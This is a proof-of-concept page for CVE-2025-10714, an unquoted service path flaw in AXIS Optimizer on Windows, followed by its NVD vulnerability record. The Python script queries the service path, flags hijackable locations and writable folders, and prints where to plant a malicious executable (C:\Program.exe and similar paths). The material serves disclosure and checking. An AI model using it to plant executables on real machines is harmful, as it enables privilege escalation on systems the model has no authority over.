CVE-2025-10714

# CVE-2025-10714 PoC - AXIS Optimizer Unquoted Service Path # This PoC demonstrates how to identify unquoted service paths # that could lead to privilege escalation import os import subprocess import sys def check_unquoted_paths(): """Check for unquoted service paths that could be exploited""" target_service = "AxisOptimizer" # Service name example # Query service configuration using sc command try: result = subprocess.run( ["sc", "qc", target_service], capture_output=True, text=True ) # Parse BINARY_PATH_NAME from output for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Found service path: {path}") # Check if path contains spaces and is not quoted if ' ' in path and not path.startswith('"'): print(f"[!] VULNERABLE: Unquoted path with spaces detected!") print(f"[!] Path components: {path.split()}") # Show potential injection points parts = path.split() for i, part in enumerate(parts[:-1]): # Exclude filename potential_path = ' '.join(parts[:i+1]) + '.exe' print(f"[!] Potential injection point: {potential_path}") if os.path.exists(os.path.dirname(potential_path)): if os.access(os.path.dirname(potential_path), os.W_OK): print(f"[!] WRITEABLE: Attacker can write to {os.path.dirname(potential_path)}") except Exception as e: print(f"[-] Error: {e}") def exploit_creation(): """Generate example malicious executable name for path hijacking""" # Example: If service path is C:\Program Files\Axis Optimizer\optimizer.exe # Attacker can place malicious C:\Program.exe or C:\Program Files\Axis.exe malicious_executables = [ "C:\\Program.exe", "C:\\Program Files\\Axis.exe" ] print("\n[!] To exploit, create malicious executable at one of these locations:") for exe_path in malicious_executables: print(f" - {exe_path}") if __name__ == "__main__": print("=== CVE-2025-10714 Unquoted Path Checker ===") check_unquoted_paths() exploit_creation()

{"cve": {"id": "CVE-2025-10714", "sourceIdentifier": "[email protected]", "published": "2025-11-11T08:15:33.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AXIS Optimizer was vulnerable to an unquoted search path vulnerability, which could potentially lead to privilege escalation within Microsoft Windows operating system. This vulnerability can only be exploited if the attacker has access to the local Windows machine and sufficient access rights (administrator) to write data into the installation path of AXIS Optimizer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.axis.com/dam/public/a2/c7/8c/cve-2025-10714pdf-en-US-504221.pdf", "source": "[email protected]"}]}}